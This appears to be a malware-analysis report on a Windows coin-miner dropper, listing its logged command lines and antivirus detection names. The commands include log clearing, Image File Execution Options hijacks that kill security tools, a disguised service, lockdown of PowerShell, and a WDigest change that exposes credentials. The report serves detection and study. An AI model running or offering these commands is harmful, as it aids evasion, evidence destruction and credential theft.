cmdline | net share iPC$ /delete |
cmdline | taskkill /f /t /im dl1hots.exe |
cmdline | attrib +s +h +r C:\Windows\Fonts\csrss.exe |
cmdline | sc stop "Application Layre Gateway Saervice" |
cmdline | attrib +s +h +r C:\Windows\lsass.exe |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f |
cmdline | net share e$ /delete |
cmdline | netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny |
cmdline | netsh ipsec static set policy name=Aliyun assign=y |
service_name | MetPipAtcivator | service_path | c:\Windows\Fonts\svchost.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger | reg_value | C:\\WINDOWS\\system32\\svchost.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger | reg_value | taskkill.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger | reg_value | taskkill.exe |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f |
parent_process | iexplore.exe | martian_process | cmd /c C:\Windows\TEMP\csonhost.bat | ||||||
parent_process | iexplore.exe | martian_process | cmd /c attrib -s -h -r -a %SystemRoot%\Fonts |
cmd | sc stop metpipatcivatorattrib +s +h +r c:\windows\svchost.execacls c:\windows\system32\sethc.exe /e /d servicec:\windows\fonts\svchost.exe set metpipatcivator displayname network location servicetakeown /f c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /anet stop mssecsvc2.0net stop mssecsvc2.1c:\users\test22\appdata\local\temp\tem.vbswevtutil cl "system"sc delete mssecsvc2.1sc delete graphipcs_perfsvcsattrib -s -h -r -a c:\windows\fontsnet share d$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /fsc config policyagent start= autosc stop microsotmaimscacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g administrators:rcacls c:\windows\fonts\csrss.exe /d everyoneattrib +s +h +r c:\windows\boy.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\hipsdaemon.exe" /v "debugger" /d taskkill.exe /fsc stop graphipcs_perfsvcssc delete microsotmaistakeown /f c:\windows\syswow64\conhost.exe /ac:\windows\fonts\svchost.exe start metpipatcivatorreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f taskkill /f /t /im sqlservr.execacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d systemc:\windows\system32\net1 share f$ /deleteattrib +s +h +r c:\windows\fonts\sqlservr.exetaskkill /f /t /im boy.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g users:rnetsh ipsec static del allc:\windows\system32\net1 stop lanmanserver /yc:\windows\system32\net1 share ipc$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\net.exe" /f c:\windows\system32\net1 share c$ /deletewevtutil cl "security" sc delete metpipatcivatornet user mm123$ /deltaskkill /f /t /im powershell.exenetsh ipsec static add filterlist name=denylistc:\windows\system32\net1 share e$ /deletec:\windows\system32\cmd.exe /s /d /c" echo y"reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\curl.exe" /v "debugger" /d taskkill.exe /fnet1 user mm123$ /delc:\windows\system32\net1 share d$ /deletecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d servicecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /g administrators:fnetsh ipsec static add filterlist name=allowlistcacls c:\windows\system32\sethc.exe /e /g administrators:rcacls c:\windows\fonts\sqlservr.exe /d everyonecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d "network service"taskkill /f /t /im d1lhots.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d servicec:\windows\fonts\svchost.exe set metpipatcivator description provides performance library information from windows management.cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d systemnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138wmic process where "name='sqlservr.exe' and executablepath='c:\\windows\\fonts\\sqlservr.exe'" call terminatesc delete microsotmaimscacls c:\windows\system32\sethc.exe /e /d "network service"c:\windows\system32\cmd.exe /s /d /c" echo y"taskkill /f /t /im lsars.exe /im lsacs.exesc stop microsotmaissc delete setpipatcivatornetsh ipsec static add filteraction name=deny action=blocksc delete "application layre gateway saervice"reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\usysdiag.exe" /v "debugger" /d taskkill.exe /ftakeown /f c:\windows\system32\windowspowershell\v1.0\powershell.exe /anet share ipc$ /deletec:\windows\system32\net1 share admin$ /deletetaskkill /f /t /im dl1hots.execacls c:\windows\syswow64\conhost.exe /d everyoneattrib +s +h +r c:\windows\fonts\csrss.execacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g users:rcacls c:\windows\system32\sethc.exe /e /g system:rsc stop "application layre gateway saervice"attrib +s +h +r c:\windows\lsass.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d c:\\windows\\system32\\svchost.exe /fcacls c:\windows\boy.exe /d everyonereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f c:\windows\system32\net1 stop mssecsvc2.0c:\windows\system32\net1 stop mssecsvc2.1net share e$ /deletenetsh ipsec static add rule name=deny1 policy=aliyun filterlist=denylist filteraction=denynetsh ipsec static set policy name=aliyun assign=yreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\certutil.exe" /v "debugger" /d taskkill.exe /fcmd /c attrib -s -h -r -a %systemroot%\fontscacls c:\windows\lsass.exe /d everyonecacls c:\windows\system32\sethc.exe /g administrators:fcacls c:\windows\system32\sethc.exe /e /g users:rsc start metpipatcivatorcacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /g administrators:fwmic process where "name='conhost.exe' and executablepath='c:\\windows\\syswow64\\conhost.exe'" call terminatesc config lanmanserver start= disabled net share f$ /deletetakeown /f c:\windows\system32\sethc.exe /ac:\windows\fonts\svchost.exe install metpipatcivator c:\windows\fonts\conhost.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d "network service"sc delete mssecsvc2.0sc stop conhostreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d taskkill.exe /fsc stop setpipatcivatorwmic process where "name='csrss.exe' and executablepath='c:\\windows\\fonts\\csrss.exe'" call terminatenetsh ipsec static add filteraction name=allow action=permitsc delete conhostcacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g administrators:rreg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f net share c$ /deletec:\windows\system32\net1 user mm123$ /delcmd /c c:\windows\temp\csonhost.batnet share admin$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /f reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\xmrig.exe" /v "deebugger" /d taskkill.exe /f net stop lanmanserver /yreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\srdsl.exe" /v "debugger" /d taskkill.exe /fwmic process where "name='svchost.exe' and executablepath='c:\\windows\\svchost.exe'" call terminatesc start policyagenttaskkill /f /t /im wscript.exenetsh ipsec static add policy name=aliyunwevtutil cl "windows powershell" reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\mshta.exe" /v "debugger" /d taskkill.exe /fcacls c:\windows\svchost.exe /d everyonetaskkill /f /t /im rundlls.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\local\temp\tem.vbs" ping 127.1 -n 5 |
parent_process | iexplore.exe | martian_process | sc stop MetPipAtcivator | ||||||
parent_process | iexplore.exe | martian_process | sc delete mssecsvc2.1 | ||||||
parent_process | iexplore.exe | martian_process | sc delete MetPipAtcivator | ||||||
parent_process | iexplore.exe | martian_process | net user mm123$ /del | ||||||
parent_process | iexplore.exe | martian_process | net stop mssecsvc2.0 | ||||||
parent_process | iexplore.exe | martian_process | net stop mssecsvc2.1 | ||||||
parent_process | iexplore.exe | martian_process | c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe | ||||||
parent_process | iexplore.exe | martian_process | sc stop MicrosotMais | ||||||
parent_process | iexplore.exe | martian_process | sc delete mssecsvc2.0 | ||||||
parent_process | iexplore.exe | martian_process | sc delete SetPipAtcivator | ||||||
parent_process | iexplore.exe | martian_process | sc stop SetPipAtcivator | ||||||
parent_process | iexplore.exe | martian_process | C:\Users\test22\AppData\Local\Temp\tem.vbs | ||||||
parent_process | iexplore.exe | martian_process | sc stop MicrosotMaims | ||||||
parent_process | iexplore.exe | martian_process | taskkill /f /t /im dl1hots.exe | ||||||
parent_process | iexplore.exe | martian_process | cmd /c C:\Windows\TEMP\csonhost.bat | ||||||
parent_process | iexplore.exe | martian_process | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f | ||||||
parent_process | iexplore.exe | martian_process | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f | ||||||
parent_process | iexplore.exe | martian_process | taskkill /f /t /im d1lhots.exe | ||||||
parent_process | iexplore.exe | martian_process | reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f | ||||||
parent_process | iexplore.exe | martian_process | c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management. | ||||||
parent_process | iexplore.exe | martian_process | sc delete MicrosotMais | ||||||
parent_process | iexplore.exe | martian_process | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f | ||||||
parent_process | iexplore.exe | martian_process | c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service | ||||||
parent_process | iexplore.exe | martian_process | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f | ||||||
parent_process | iexplore.exe | martian_process | c:\windows\Fonts\svchost.exe start MetPipAtcivator | ||||||
parent_process | iexplore.exe | martian_process | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f | ||||||
parent_process | iexplore.exe | martian_process | net1 user mm123$ /del | ||||||
parent_process | iexplore.exe | martian_process | sc delete MicrosotMaims | ||||||
parent_process | iexplore.exe | martian_process | taskkill /f /t /im rundlls.exe | ||||||
parent_process | iexplore.exe | martian_process | cmd /c attrib -s -h -r -a %SystemRoot%\Fonts | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs" |
cmdline | cacls C:\Windows\system32\sethc.exe /e /d SERVICE |
cmdline | wevtutil cl "system" |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\Fonts\csrss.exe /d everyone |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | wevtutil cl "security" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\sethc.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\Fonts\sqlservr.exe /d everyone |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\system32\sethc.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\conhost.exe /d everyone |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\sethc.exe /e /g system:r |
cmdline | cacls C:\Windows\boy.exe /d everyone |
cmdline | cacls C:\Windows\lsass.exe /d everyone |
cmdline | cacls C:\Windows\system32\sethc.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\sethc.exe /e /g Users:r |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | wevtutil cl "windows powershell" |
cmdline | cacls C:\Windows\svchost.exe /d everyone |
file | C:\Windows\SysWOW64\wscript.exe |
Lionic | Trojan.Win32.Miner.4!c |
tehtris | Generic.Malware |
MicroWorld-eScan | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 |
FireEye | Generic.mg.a3d8b7059f0a4108 |
McAfee | Artemis!A3D8B7059F0A |
Cylance | Unsafe |
Zillya | Dropper.FlyStudio.Win32.1 |
Sangfor | Virus.Win32.Save.a |
K7AntiVirus | Trojan ( 0058f6531 ) |
Alibaba | Trojan:Win32/Coinminer.449 |
K7GW | Trojan ( 0058f6531 ) |
Cybereason | malicious.59f0a4 |
Arcabit | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 |
BitDefenderTheta | Gen:NN.ZexaF.36276.8pKfaC5bmGlb |
Cyren | W32/ABRisk.ZBIN-2175 |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (moderate confidence) |
ESET-NOD32 | a variant of Win32/TrojanDropper.FlyStudio.CO |
APEX | Malicious |
Paloalto | generic.ml |
Cynet | Malicious (score: 100) |
Kaspersky | HEUR:Trojan.Win32.Miner.gen |
BitDefender | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 |
NANO-Antivirus | Trojan.Win32.Miner.jusrbx |
Avast | FileRepMalware [Misc] |
Tencent | Risktool.Win64.Bitminer.16000063 |
Emsisoft | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 (B) |
F-Secure | Heuristic.HEUR/AGEN.1254285 |
DrWeb | Tool.Nssm.2 |
VIPRE | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 |
TrendMicro | TROJ_GEN.R002C0DB523 |
McAfee-GW-Edition | BehavesLike.Win32.Flyagent.wc |
Trapmine | malicious.high.ml.score |
Sophos | Mal/Generic-S |
SentinelOne | Static AI - Malicious PE |
Avira | HEUR/AGEN.1254285 |
Antiy-AVL | Trojan/Win32.FlyStudio.a |
Gridinsoft | Ransom.Win32.Wacatac.sa |
Xcitium | Packed.Win32.MUPX.Gen@24tbus |
Microsoft | Trojan:Win32/CoinMiner!MTB |
ZoneAlarm | not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.gen |
GData | Win32.Trojan.PSE.10TFD8O |
Detected | |
AhnLab-V3 | Malware/Win32.Generic.C1805593 |
VBA32 | Trojan.Agentb |
ALYac | Generic.Dacic.1.BitCoinMiner.A.12CE9F78 |
MAX | malware (ai score=80) |
Malwarebytes | Trojan.FlyStudio |
TrendMicro-HouseCall | TROJ_GEN.R002C0DB523 |
Rising | HackTool.NSSM!1.CABB (CLOUD) |